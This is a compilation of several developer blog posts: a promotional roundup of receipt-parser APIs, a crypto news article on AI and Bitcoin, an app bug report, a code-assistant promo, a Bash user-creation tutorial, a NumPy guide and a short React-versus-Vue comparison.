Apache Tika is an open-source content analysis toolkit that can extract text from various document formats. By leveraging its OCR capabilities, developers can extract text from images of receipts and then apply custom parsing logic to structure the data.

Tika provides a straightforward integration path for developers who are familiar with Java and content analysis, making it relatively easy to use in projects. Its broad support for different file types and its ability to extract metadata make it versatile, though additional customization might be needed for optimal receipt data extraction.

### [OCR.space Free OCR API](https://ocr.space/?referral=top-free-receipt-parser-apis-and-open-source-models)

OCR.space, although not an open source model, offers a free OCR API that provides a straightforward method for parsing images and multi-page PDF documents and getting the extracted text results in JSON format. It supports a rate limit of 500 requests per day per IP address, making it a generous option for developers looking to integrate OCR capabilities without incurring costs.

The API provides decent accuracy for general OCR tasks and supports output in JSON format, which is useful for developers. As an API, OCR.space is very easy to integrate into applications, requiring minimal setup and offering a straightforward method for OCR tasks.

## Cons of Using Open Source AI models

Although open-source AI models offer numerous benefits, they also present certain drawbacks and hurdles. Here are some disadvantages of utilizing open-source models:

- Not Entirely Cost Free: Despite being valuable resources, open-source models may not always be entirely cost-free. Users often incur expenses for hosting and server usage, particularly when dealing with large or resource-intensive datasets.
- Lack of Support: Open-source models may lack official support channels or dedicated customer service teams. When encountering issues or needing assistance, users might have to depend on community forums or volunteers, which may not offer the same reliability as commercial support.
- Limited Documentation: Some open-source models may lack comprehensive or well-maintained documentation. This can pose challenges for developers in understanding how to effectively utilize the model, resulting in frustration and wasted time.
- Security Concerns: Security vulnerabilities can exist in open-source models, and addressing these issues may take longer compared to commercially supported models. Users may need to actively monitor for security updates and patches.
- Scalability and Performance: Open-source models might not be as optimized for performance and scalability as commercial counterparts. Applications requiring high performance or handling numerous requests may necessitate additional time investment in optimization efforts.

## Why choose Eden AI?

Given the potential costs and challenges related to open-source models, one cost-effective solution is to use APIs. Eden AI simplifies the integration and implementation of AI technologies with its API, which connects to multiple AI engines.

Eden AI presents a broad range of AI APIs on its platform, customized to suit your needs and financial limitations. These technologies include data parsing, language identification, sentiment analysis, logo recognition, question answering, data anonymization, speech recognition, and numerous other capabilities. To get started, we offer free credit for you to explore our APIs.
![Eden AI APP](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oi7gpm6rhsfhl6ym63tg.png)

**_[Try Eden AI for FREE](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)_**

## Access Receipt Parser Providers with One API

Our standardized API enables you to integrate Receipt Parser APIs into your system with ease by utilizing various providers on Eden AI. Here is the list (in alphabetical order):

### [Affinda](https://www.affinda.com/?referral=top-free-receipt-parser-apis-and-open-source-models) — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Affinda Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g960enynepp0qullbrul.png)

Affinda’s Receipt Parser API employs cutting-edge optical character recognition (OCR) and machine learning algorithms to automate the extraction of key data from receipts. By accurately capturing details like merchant information, transaction amounts, dates, and itemized purchases, the API enables businesses to streamline expense tracking and accounting processes and gain valuable insights from receipt data. Affinda’s solution is designed for seamless integration into various applications, providing an efficient and user-friendly interface for managing receipt data extraction and analysis.

### AWS — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Amazon Web Services Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q1c43c7t0m6r8jwi2jlg.png)

AWS’s Receipt Parsing API leverages advanced machine learning to intelligently parse and extract data from a wide variety of receipt formats. Designed to handle large volumes of receipt data, the API is suitable for both small-scale applications and enterprise-level systems. AWS ensures high availability, reliable access, and automatic scaling to accommodate fluctuating workloads. Additionally, AWS provides a secure environment for processing sensitive receipt data, giving businesses peace of mind.

### Base64 — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Base64 Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qlwnfek14xt82258lrnc.png)

Base64’s Receipt Parser API utilizes state-of-the-art machine learning algorithms to automate the extraction of data from paper receipts, digital receipts, and receipts with complex formatting. The API’s user-friendly design allows for seamless integration into existing workflows, helping businesses save valuable time and reduce errors associated with manual data entry.

### Dataleon — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Dataleon logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lasc17ln7rcnwx96bzdn.png)

Dataleon’s Receipt Parser API delivers a high level of accuracy and real-time receipt management for data extraction. The API’s intuitive interface enables businesses to extract data from a diverse range of receipt formats, including handwritten receipts. Dataleon’s solution offers a customizable approach, allowing businesses to select the specific fields they want to extract, making it a versatile option for various industries.

### Google Cloud — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Google Cloud Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9y6t560grum1w0kpyfk5.png)

Google Cloud’s Receipt Parser API leverages machine learning to extract data from receipts with high accuracy, even handling handwritten receipts. The API’s customizable solutions enable businesses to extract specific data fields tailored to their needs.
Google Cloud’s powerful image recognition technology ensures accurate data extraction, even from poorly scanned or low-quality receipts.

### Klippa — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Klippa logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9lnnlrnc64larz6ganlz.png)

Klippa’s Receipt Parser API automates numerous receipt-related business processes using advanced machine learning. It offers features such as format conversion, scan quality improvement, and the ability to convert receipt images into structured text and JSON formats using OCR. Klippa’s solution also provides receipt and line item classification, streamlining data analysis, storage, and archiving. Additionally, it offers cross-validation of receipt data, ensuring accuracy and reliability.

### Microsoft Azure — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Microsoft Azure logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s241yjnziadz8g4xh1p4.png)

Azure’s Receipt Parsing API, powered by the Form Recognizer receipt model, combines OCR and deep learning to intelligently analyze and extract information from a wide range of receipt formats and qualities, including printed and handwritten receipts. The API accurately captures key details like merchant name, phone number, transaction date, tax, and total, returning the data in structured JSON format for seamless integration into existing systems and workflows.

### Mindee — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Mindee logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x00on9jygr631t166b3x.png)

Mindee’s Receipt Parser API combines computer vision and natural language processing (NLP) to deliver accurate and efficient data extraction from receipts. Mindee prioritizes user experience, offering interactive UI components that transform documents into intuitive interfaces, maximizing customer satisfaction and ensuring a smooth data extraction process. Mindee’s API is production-ready, enabling optimized web and mobile rendering features to be quickly integrated into any application, and its fast inference pipeline enables real-time data extraction.

### TabScanner — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![TabScanner logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/in20vj3hbp7x3el9dmrw.png)

TabScanner’s Receipt Parser offers intelligent data capture powered by an AI that understands receipt fields at near-human levels. The cloud API processes all data fields from a POS receipt in under 2 seconds, with a claimed 98% accuracy on core data. TabScanner’s technology can extract line item data from POS receipts worldwide, regardless of language or character set. The feature set includes regional parameters, ongoing machine learning for data refinement, format configurations, and flexible subscription options for high-volume users.
### Veryfi — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)

![Veryfi logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ze1dtp4xw04meotc21xa.png)

Veryfi’s API employs state-of-the-art machine learning models to accurately recognize and extract information from receipts, significantly reducing the need for manual data entry. The highly customizable solution can be tailored to fit the specific needs of individual businesses, allowing for seamless integration into existing workflows and optimization to meet unique requirements. Veryfi’s API is designed for scalability, reliability, and user-friendliness, making it a top choice for businesses looking to streamline their receipt processing workflows.

## Pricing Structure for Receipt Parser APIs

Eden AI offers a user-friendly platform for comparing pricing information from diverse API providers and monitoring price changes over time. As a result, keeping up to date with the latest pricing is crucial. The pricing chart below outlines the rates for smaller quantities as of December 2023; discounts are available for large volumes.

![Receipt Parser Prices on Eden AI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3qhto9116559yf1zjgs4.png)

_**[Check the current prices on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)**_

## How Can Eden AI Help You?

Eden AI is the future of AI usage in companies: our app allows you to call multiple AI APIs.

![Multiple AI Engines in one API Key - Eden AI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/15cmerxl7qd6ktfsj31a.gif)

- Centralized and fully monitored billing on Eden AI for Receipt Parser APIs
- Unified API for all providers: simple and standard to use, quick switching between providers, access to the specific features of each provider
- Standardized response format: the JSON output format is the same for all suppliers thanks to Eden AI’s standardization work. The response elements are also standardized thanks to Eden AI’s powerful matching algorithms.
- The best Artificial Intelligence APIs on the market are available: big cloud providers (Google, AWS, Microsoft) as well as more specialized engines
- Data protection: Eden AI will not store or use any data. You can also filter to use only GDPR-compliant engines.

You can see the Eden AI documentation [here](https://docs.edenai.co/docs/ocr-document-parsing?referral=top-free-receipt-parser-apis-and-open-source-models).

## Next Steps in Your Project

The Eden AI team can help you with your Receipt Parser integration project. This can be done by:

- Organizing a product demo and a discussion to better understand your needs. You can book a time slot on this link: Contact
- Testing the public version of Eden AI for free. Note that not all providers are available on this version; some are only available on the Enterprise version.
- Benefiting from the support and advice of a team of experts to find the optimal combination of providers according to the specifics of your needs
- Integrating on a third-party platform: we can quickly develop connectors.

**_[Create your Account on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)_**
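To make the "unified API" idea concrete, here is a minimal Python sketch of how a client might assemble a single receipt-parsing request that fans out to several providers. The endpoint URL and the payload field names used here are assumptions chosen for illustration, not Eden AI's documented schema — consult the documentation linked above for the real request format:

```python
import json

# Hypothetical endpoint -- check Eden AI's docs for the real one.
EDENAI_RECEIPT_URL = "https://api.edenai.run/v2/ocr/receipt_parser"  # assumed

def build_receipt_request(api_key, providers, file_url):
    """Assemble headers and a JSON body for a multi-provider receipt-parsing call."""
    headers = {"Authorization": f"Bearer {api_key}"}
    body = json.dumps({
        "providers": ",".join(providers),  # one request, several engines (assumed field)
        "file_url": file_url,              # publicly reachable receipt image (assumed field)
    })
    return headers, body

headers, body = build_receipt_request(
    "MY_API_KEY", ["amazon", "google"], "https://example.com/receipt.jpg"
)
print(body)
# Sending it would then be a single POST, e.g.:
#   requests.post(EDENAI_RECEIPT_URL, headers=headers, data=body)
```

The point of the sketch is the shape of the integration: one credential, one payload, and a provider list — switching engines is a string change rather than a new SDK.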
edenai
1,909,032
Anthony Pompliano on AI and Bitcoin: Catalysts for Wealth Creation
Artificial intelligence and blockchain have become key players in the transformation of various...
0
2024-07-02T14:13:59
https://36crypto.com/anthony-pompliano-on-ai-and-bitcoin-catalysts-for-wealth-creation/
cryptocurrency, blockchain, ai, news
Artificial intelligence and blockchain have become key players in the transformation of various spheres of life. In particular, the intersection of these two technologies has long been discussed by leading opinion leaders in the crypto industry. Recently, Anthony Pompliano, a well-known investor and founder of Pomp Investments, [said](https://www.youtube.com/watch?v=jVGxHvNS-N0) that he expects the next decade to be marked by the synergy of these two technologies. In his opinion, artificial intelligence will create significant wealth, and Bitcoin will play an important role in preserving it.

**The Role of AI and Bitcoin in Wealth Creation**

Pompliano noted that many people used to focus on Bitcoin and the crypto sector in general. Today, the focus has shifted to artificial intelligence, and in his opinion, this is not a bad thing.

_“But I think people are kind of missing that these are actually part of the same trend,”_ he said.

The investor points out that the world is moving towards an era of automation, when artificial intelligence will create enormous wealth. And when this era becomes a reality, Bitcoin's role will be to protect that wealth.

_“When you see these technologies coming together, an easy way to see the intersection is what money are these machines going to use?”_ Pompliano stated during the interview.

Pompliano believes that as artificial intelligence develops and grows through investment, investors will return to Bitcoin. When this happens, he is convinced that the United States will experience GDP growth thanks to the productivity of AI. Bitcoin's ability to participate in this potential massive development of artificial intelligence could lead to a recovery in the coin's price. In his opinion, the recent drop in Bitcoin is the result of investors' decision to invest in artificial intelligence instead.

But Pompliano isn't worried about the current 15% price drop, pointing out that bull markets typically see several pullbacks of 30% or more.

_“A lot of people in public markets say ‘invest until May and go away,’ and as a result, the second and third quarters tend to trade sideways — particularly in halving years,”_ he explained.

Pompliano believes that a similar situation is playing out now, but he expects another price rally in the last quarter of the year or early 2025, which is also a historical trend in halving years.

**Combination of Artificial Intelligence and Blockchain**

The combination of blockchain and artificial intelligence opens up broad prospects for the development of technologies and applications in various industries. One of the key aspects of this intersection is increasing the efficiency of blockchain networks by using machine learning algorithms. AI algorithms can help improve consensus-building processes, provide fast transaction verification, and optimize distributed data processing.

In addition, the introduction of artificial intelligence can improve the security of blockchain systems by detecting and preventing fraud and cyberattacks. Analyzing large amounts of data in real time allows unusual or suspicious activity to be detected, which contributes to a high level of security and reliability.

Equally important is the use of machine learning technologies to manage and analyze large amounts of data in blockchain networks. They allow for efficient processing of transaction and user information, providing a better understanding of demand, predicting user behavior, and improving the operational efficiency of the system as a whole.

A number of influential people are optimistic about the intersection of these two technologies. In particular, Vitalik Buterin, co-founder of Ethereum, wrote a thorough [article](https://vitalik.eth.limo/general/2024/01/30/cryptoai.html) on the prospects and problems of using AI and cryptocurrencies. In it, he highlighted the points of intersection between blockchain and artificial intelligence technologies: data management, transparency, monetization, and cost reduction. He also categorized AI into several types in the context of decentralized technologies and laid out the pros and cons of each of these areas. In addition, he [spoke](https://x.com/VitalikButerin/status/1759369749887332577) about the successful experience of integrating AI into Ethereum to detect and fix code errors in the network.

_“Now that both blockchains and AIs are becoming more powerful, there is a growing number of use cases in the intersection of the two areas. However, some of these use cases make much more sense and are much more robust than others. I look forward to seeing more attempts at constructive use cases of AI in all of these areas, so we can see which of them are truly viable at scale,”_ he wrote.

Volodymyr Nosov, CEO of WhiteBIT, is also positive about the integration of artificial intelligence, noting that AI is a must-have for the crypto industry. According to Nosov, artificial intelligence has already proven itself at WhiteBIT in design, writing, translation, and text adaptation. He emphasizes the technology's potential and suggests that one day it will be able to ease the months-long onboarding of developers.

Marcello Mari, founder of SingularityDAO, a decentralized portfolio management protocol, also [emphasized](https://aibc.world/news/marcello-mari-highlights-convergence-of-ai-blockchain/) the transformative impact of artificial intelligence and blockchain. He said that AI enhances blockchain technology by optimizing computing resources and improving data privacy through innovative methods such as homomorphic encryption. On the other hand, blockchain makes it easier to receive fair compensation for content created with artificial intelligence and ensures the security of transactions through distributed ledger technology, mitigating issues such as copyright infringement.

_“Any company in the world will eventually use artificial intelligence and will have to use artificial intelligence and is already using artificial intelligence,”_ he remarked.

**Summary**

Anthony Pompliano emphasizes that artificial intelligence has the potential to create significant wealth, and Bitcoin can provide protection for this future wealth. In his opinion, the combination of these technologies will bring great benefits, in particular by increasing the productivity and efficiency of systems. The combined use of artificial intelligence and blockchain can improve security, optimize data processing, and provide fast transaction verification.
hryniv_vlad
1,909,031
Unearthing Efficiency: My Experience Bug Hunting with SAW
Scrape Any Website (SAW) promises to be a powerful tool for web data extraction. But as with any...
0
2024-07-02T14:13:56
https://dev.to/marg4cf3553b4099/unearthing-efficiency-my-experience-bug-hunting-with-saw-4h37
Scrape Any Website (SAW) promises to be a powerful tool for web data extraction. But as with any software, a keen eye can uncover areas for improvement. This blog post details my exploration of SAW, highlighting the bugs I encountered and suggesting potential solutions.

## Exploratory Testing: Delving into SAW's Functionalities

My journey began with downloading SAW from the official Windows Store page: [SAW - Windows Store](https://apps.microsoft.com/detail/9mzxn37vw0s2?hl=en-gb&gl=GB). Launching the application, I familiarized myself with the interface, focusing on testing various features and pushing the app to its limits. My goal was to identify not just bugs, but also areas where usability could be enhanced.

## Bug Report: Unveiling the Cracks in the Facade

My exploration yielded several noteworthy bugs. Here are a few of the most critical ones:

**Missing Selectivity:** Say you only want to scrape data from a specific web page. Unfortunately, the current version of SAW doesn't allow you to select individual URLs for scraping. Instead, it scrapes all URLs associated with a website. This can be a major roadblock if you're only interested in a specific data set.

**Unresponsive UI Elements:** Hovering over some options resulted in no visual change, unlike other interactive elements. This inconsistency can lead to user confusion, making it unclear whether the option is functional. Implementing consistent hover effects would improve the user experience.

**Inoperable Settings:** The settings menu within SAW offered configuration options for browsers but lacked a crucial "Save" button. Without this functionality, any adjustments made are lost upon closing the application. A prominent "Save" button is essential to ensure user-defined settings persist.

**Dashboard Disconnect:** The main dashboard seems to be grappling with a communication gap. Jobs and URLs added to scrape jobs don't always show up on the dashboard, leaving you uncertain about the progress or presence of your data.

**Information Blackout:** Obtaining basic information about the software itself, like the version number, proved to be a challenge. Additionally, there's no built-in help section or FAQ to guide users through potential issues.

## Beyond Bug Hunting: Suggestions for Improvement

While bug fixing is vital, I believe SAW has the potential to be even more user-friendly. Here are some additional suggestions:

**Informative Dashboard:** The main dashboard currently displays limited information. Highlighting the number of URLs added, scrape status, and extracted data would provide valuable insights at a glance.

**Accessibility Features:** Integrating features like software version information and a dedicated Help section with FAQs would empower users to troubleshoot independently and stay informed.

**Granular URL Selection:** The ability to choose specific URLs within a scrape job would let users target their data collection precisely.

**Enhanced User Interface:** Incorporating hover highlights and other visual cues can significantly improve the application's user-friendliness and intuitiveness.

**Real-Time Dashboard Updates:** A dynamic and responsive dashboard that reflects changes made within the application would provide valuable feedback to users and eliminate confusion.

## Conclusion: A Work in Progress

SAW presents a promising solution for web data extraction. By addressing the identified bugs and incorporating the suggested improvements, SAW can evolve into a powerful and user-friendly tool. This experience has solidified the importance of thorough testing in software development.

For a detailed exploration of the bugs I encountered, you can access my comprehensive bug report: [SAW BUG Report.xlsx](https://1drv.ms/x/s!Ajr0qU-KpaKWvWLdIokc8WhBk8T3?e=Luuim7). Additionally, to download SAW and embark on your own data scraping adventures, visit the official [Scrape Any Website](https://scrapeanyweb.site/) site or the [Windows Store](https://apps.microsoft.com/detail/9mzxn37vw0s2?hl=en-gb&gl=GB).
marg4cf3553b4099
1,909,029
## Supercharge Your Coding with Codebot: An AI-Powered Assistant 🚀
Hello Dev.to community! 👋 I'm excited to introduce Codebot, an AI-driven code assistant designed to...
0
2024-07-02T14:13:26
https://dev.to/aviralgarg05/-supercharge-your-coding-with-codebot-an-ai-powered-assistant-2l0a
javascript, github, ai, llm
Hello Dev.to community! 👋 I'm excited to introduce **[Codebot](https://github.com/aviralgarg05/Codebot)**, an AI-driven code assistant designed to enhance your coding experience. Let's dive into what makes Codebot so awesome and how it can help you write better code faster.

### What is Codebot? 🤖

Codebot is a powerful tool that leverages Large Language Models (LLMs) to understand and generate code. Here’s a quick rundown of its core features:

- **Code Completion**: Predicts and completes code snippets based on the current context, saving you time and reducing syntax errors.
- **Code Generation**: Need a specific function or code block? Just give Codebot a prompt, and it will generate the necessary code for you.
- **Multi-Language Support**: Whether you’re working with Python, JavaScript, or another language, Codebot has you covered.
- **IDE Integration**: Integrates seamlessly with popular Integrated Development Environments (IDEs) for a smooth coding experience.
- **AI-Powered Suggestions**: Utilizes cutting-edge machine learning models to provide intelligent and context-aware code suggestions.

### Why Codebot is Cool 😎

- **Boosts Productivity**: Automates repetitive tasks and boilerplate code generation, allowing you to focus on more complex parts of your project.
- **Reduces Errors**: Helps minimize syntax and logical errors with smart suggestions, leading to more reliable and maintainable code.
- **Supports Learning**: Acts as a fantastic learning aid for beginners, offering instant feedback and coding best practices.
- **AI-Powered**: Constantly improves and adapts to your coding style, providing increasingly accurate and relevant suggestions.

### Integration with MindsDB 🧠

Codebot integrates with **MindsDB**, an open-source machine learning platform, to enhance its predictive capabilities. This combination helps ensure accurate and contextually appropriate code suggestions.

---

Vote for the project on [Quira](https://quira.sh/repo/aviralgarg05-Codebot-822485863?utm_source=copy&utm_share_context=rdp) to show your support, and check out the [Codebot GitHub repository](https://github.com/aviralgarg05/Codebot) to start supercharging your coding workflow today!

Happy coding! 🎉
aviralgarg05
1,909,028
Automating User Account Management in Linux with a Bash Script
User Management is an integral part of a Sys Ops Engineer, as this is useful in day-to-day activity....
0
2024-07-02T14:12:40
https://dev.to/hollyphat/automating-user-account-management-in-linux-with-a-bash-script-248n
automation, hng11, bash
User management is an integral part of a SysOps engineer's day-to-day activity, and it is usually required when onboarding new members of staff. In this piece, we will go through the process of creating and assigning new users. This is part of the HNG Internship requirements; you can learn more about HNG via the link below.

[HNG Internship](https://hng.tech/internship)

## Premise

Manually handling user accounts can be tedious and often leads to mistakes. To make things easier and more reliable, we should automate this process. We'll create a script called `create_users.sh` that will read a list of usernames and groups from a given text file, create the users and groups, set up their home directories, generate random passwords, and log everything to a log file. This will save time, reduce errors, and keep things consistent.

## Prerequisites

The following are the requirements needed to create and execute the script:

- Basic knowledge of Linux commands
- Admin privileges
- A text editor, e.g. Vim, Nano, TextEdit, etc.

## Overview

The script is expected to perform the following tasks:

1. Read a list of users and groups from any given text file.
2. Create users and assign them to specified groups.
3. Set up home directories with appropriate permissions.
4. Generate random passwords for the users.
5. Log all actions to `/var/log/user_management.log`.
6. Store the generated passwords securely in `/var/secure/user_passwords.csv`.
## Procedure

- Define variables to hold the input file, the log file, and the password file:

```
INPUT_FILE="$1"
LOG_FILE="/var/log/user_management.log"
PASSWORD_FILE="/var/secure/user_passwords.csv"
```

- Create helper functions to perform common tasks:

```
# Function to log messages
log_message() {
    echo "$(date '+%Y-%m-%d %H:%M:%S') - $1" | sudo tee -a "$LOG_FILE" > /dev/null
}

# Function to generate a random password
random_password() {
    < /dev/urandom tr -dc 'A-Za-z0-9' | head -c 12
}
```

- Create the directories and files, and set their permissions:

```
# Create the necessary directories if they do not exist
sudo mkdir -p /var/log
sudo mkdir -p /var/secure

# Create the log file if it does not exist, and set the necessary permissions
sudo touch "$LOG_FILE"
sudo chmod 600 "$LOG_FILE"

# Create the password file if it does not exist, and set the necessary permissions
sudo touch "$PASSWORD_FILE"
sudo chmod 600 "$PASSWORD_FILE"
```

- The code below reads the input file line by line, creates each user, adds them to their groups, and sets a password:

```
# Read the input file line by line
while IFS=';' read -r username groups; do
    # Remove whitespace from the username and groups
    username=$(echo "$username" | xargs)
    groups=$(echo "$groups" | xargs)

    # Create the new user
    if id -u "$username" >/dev/null 2>&1; then
        log_message "User $username already exists. Creation skipped."
    else
        sudo useradd -m -s /bin/bash "$username"
        if [ $? -eq 0 ]; then
            log_message "New user: $username created successfully."
        else
            log_message "Unable to create user: $username."
            continue
        fi
    fi

    # Create the new user's personal group
    if ! getent group "$username" >/dev/null 2>&1; then
        sudo groupadd "$username"
        log_message "Personal group $username created successfully."
    fi

    # Add the user to their personal group
    sudo usermod -aG "$username" "$username"

    # Add the user to the other groups
    IFS=',' read -ra group_array <<< "$groups"
    for group in "${group_array[@]}"; do
        group=$(echo "$group" | xargs)  # Remove whitespace
        if ! getent group "$group" >/dev/null 2>&1; then
            sudo groupadd "$group"
            log_message "Group $group created."
        fi
        sudo usermod -aG "$group" "$username"
        log_message "User $username added to group: $group."
    done

    # Generate a random password and set it for the created user
    password=$(random_password)
    echo "$username:$password" | sudo chpasswd
    echo "$username,$password" | sudo tee -a "$PASSWORD_FILE" > /dev/null
    log_message "Password set for user $username."
done < "$INPUT_FILE"
```

- Finally, log a message to show the status after execution:

```
log_message "User creation script completed."
echo "User creation process is complete. Check $LOG_FILE for details."
```

## Conclusion

Using a bash script to automate user account management can greatly simplify the onboarding process for new employees, users, or accounts. By following the steps outlined in this article, you can create an effective script that ensures users are created, added to groups, and provided with secure passwords, all while logging actions for transparency and audit purposes.

This tutorial is made possible by [HNG](https://hng.tech/hire). You can find the bash code at [https://github.com/hollyphat/Hng11-Stage-1](https://github.com/hollyphat/Hng11-Stage-1).
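One detail worth spelling out: the `while IFS=';' read -r username groups` loop means the script expects each input line to be a username, a semicolon, and then a comma-separated list of groups. A small illustrative input file (the usernames here are made up) would look like this:

```
light;sudo,dev,www-data
idimma;sudo
mayowa;dev,www-data
```

Running the script as `bash create_users.sh users.txt` against a file like this would create three users, each with a personal group, and add them to the listed groups; the `xargs` calls in the loop mean stray spaces around names are tolerated.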
hollyphat
1,909,025
A Comprehensive Guide to NumPy with Python 🐍🎲
NumPy, short for Numerical Python, is a fundamental package for scientific computing in Python. It...
0
2024-07-02T14:09:05
https://dev.to/kammarianand/a-comprehensive-guide-to-numpy-with-python-2mc9
python, numpy, datascience, beginners
NumPy, short for Numerical Python, is a fundamental package for scientific computing in Python. It provides support for arrays, matrices, and many mathematical functions. If you're working with data in Python, understanding NumPy is essential. In this post, we'll explore the basics of NumPy and dive into various examples to illustrate its capabilities.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hfzvur5b5ll6kzum2ze5.jpeg)

## </> Installation

Before we get started, ensure that NumPy is installed. You can install it using pip:

```bash
pip install numpy
```

## Basics of NumPy

### Importing NumPy

To use NumPy, you need to import it. The convention is to import it as `np`:

```python
import numpy as np
```

### Creating Arrays

NumPy arrays are the main way to store data. You can create arrays using the `array` function:

```python
# Creating a 1D array
arr1 = np.array([1, 2, 3, 4, 5])
print("1D Array:", arr1)

# Creating a 2D array
arr2 = np.array([[1, 2, 3], [4, 5, 6]])
print("2D Array:\n", arr2)
```

**Output:**

```
1D Array: [1 2 3 4 5]
2D Array:
 [[1 2 3]
 [4 5 6]]
```

### Array Operations

NumPy arrays support a variety of operations, such as element-wise addition, subtraction, multiplication, and division.

```python
arr1 = np.array([1, 2, 3])
arr2 = np.array([4, 5, 6])

# Element-wise addition
sum_arr = arr1 + arr2
print("Sum:", sum_arr)

# Element-wise multiplication
prod_arr = arr1 * arr2
print("Product:", prod_arr)
```

**Output:**

```
Sum: [5 7 9]
Product: [ 4 10 18]
```

### Array Slicing

Just like lists in Python, NumPy arrays can be sliced.

```python
arr = np.array([1, 2, 3, 4, 5, 6])

# Slicing elements from index 2 to 4
sliced_arr = arr[2:5]
print("Sliced Array:", sliced_arr)
```

**Output:**

```
Sliced Array: [3 4 5]
```

## Advanced Features of NumPy

### Mathematical Functions

NumPy provides a wide range of mathematical functions.
```python
arr = np.array([0, np.pi/2, np.pi])

# Sine function
sin_arr = np.sin(arr)
print("Sine:", sin_arr)

# Exponential function
exp_arr = np.exp(arr)
print("Exponential:", exp_arr)
```

**Output:**

```
Sine: [0.0000000e+00 1.0000000e+00 1.2246468e-16]
Exponential: [ 1.          4.81047738 23.14069263]
```

### Statistical Functions

NumPy includes a variety of statistical functions.

```python
arr = np.array([1, 2, 3, 4, 5])

# Mean
mean_val = np.mean(arr)
print("Mean:", mean_val)

# Standard Deviation
std_val = np.std(arr)
print("Standard Deviation:", std_val)
```

**Output:**

```
Mean: 3.0
Standard Deviation: 1.4142135623730951
```

### Linear Algebra

NumPy has robust support for linear algebra operations.

```python
arr1 = np.array([[1, 2], [3, 4]])
arr2 = np.array([[5, 6], [7, 8]])

# Matrix multiplication
mat_mul = np.dot(arr1, arr2)
print("Matrix Multiplication:\n", mat_mul)
```

**Output:**

```
Matrix Multiplication:
 [[19 22]
 [43 50]]
```

### Random Module

NumPy’s random module can be used to generate random numbers.

```python
# Generate a 3x3 array of random numbers
random_arr = np.random.random((3, 3))
print("Random Array:\n", random_arr)
```

**Output** (your values will differ on each run):

```
Random Array:
 [[0.5488135  0.71518937 0.60276338]
 [0.54488318 0.4236548  0.64589411]
 [0.43758721 0.891773   0.96366276]]
```

## Conclusion

NumPy is a powerful library for numerical computations in Python. It provides efficient storage and manipulation of data, making it an essential tool for data science and machine learning. The examples above just scratch the surface of what NumPy can do. I encourage you to explore more and utilize NumPy in your data projects.

Feel free to ask questions or share your experiences with NumPy in the comments below!

---

About Me:

🖇️ <a href="https://www.linkedin.com/in/kammari-anand-504512230/">LinkedIn</a>
🧑‍💻 <a href="https://www.github.com/kammarianand">GitHub</a>
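As a short postscript to the examples above, one mechanism that underlies NumPy's element-wise operations and deserves its own sketch is broadcasting: NumPy automatically stretches a smaller array across a larger one, so shapes like `(2, 3)` and `(3,)` combine without explicit loops or copies.

```python
import numpy as np

matrix = np.array([[1, 2, 3],
                   [4, 5, 6]])        # shape (2, 3)
row_offsets = np.array([10, 20, 30])  # shape (3,)

# The 1D array is broadcast across each row of the matrix.
result = matrix + row_offsets
print(result)
# [[11 22 33]
#  [14 25 36]]
```

The same rule is what makes expressions like `arr * 2` work: the scalar is broadcast over every element.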
kammarianand
1,909,024
React VS Vue | HNG internship
Introduction React and Vue are two of the most popular JavaScript frameworks. Both have unique...
0
2024-07-02T14:08:30
https://dev.to/clarenceg01/react-vs-vue-hng-internship-209e
webdev, react, javascript, programming
**Introduction**

React and Vue are two of the most popular JavaScript frameworks. Both have unique strengths and weaknesses, and choosing either of the two to use in a project can be difficult. This article aims to help developers make an informed choice.

**React**

React is a JavaScript library developed and maintained by Facebook. It focuses on building user interfaces, especially for single-page applications. React is known for its virtual DOM, component-based architecture that enables re-usability, and unidirectional data flow.

**Vue**

Vue is a progressive JavaScript framework created by Evan You. Vue is designed to be incrementally adoptable and can scale between a library and a full-fledged framework depending on your needs. It emphasizes simplicity and flexibility, with a core library focusing on the view layer and an ecosystem of supporting libraries for more advanced features.

**Comparison Between React and Vue: Which to Pick**

When deciding between React and Vue for your next project, it's essential to consider their core differences and strengths. React, developed by Facebook, offers a robust and flexible ecosystem, making it ideal for large-scale applications that require complex state management and frequent updates. Its use of JSX and emphasis on a component-based architecture appeal to developers who prefer a functional programming approach. Conversely, Vue, created by Evan You, stands out for its simplicity and ease of integration, featuring an HTML-based template syntax that is more intuitive for beginners and a gentler learning curve. Vue's cohesive ecosystem, including Vuex for state management, makes it a great choice for small to medium-sized projects where rapid development and ease of use are priorities.

Ultimately, your choice should depend on your specific project requirements, team expertise, and long-term maintenance goals, with React being more suitable for larger, more complex applications, and Vue being a better fit for smaller, more straightforward projects.

**Conclusion**

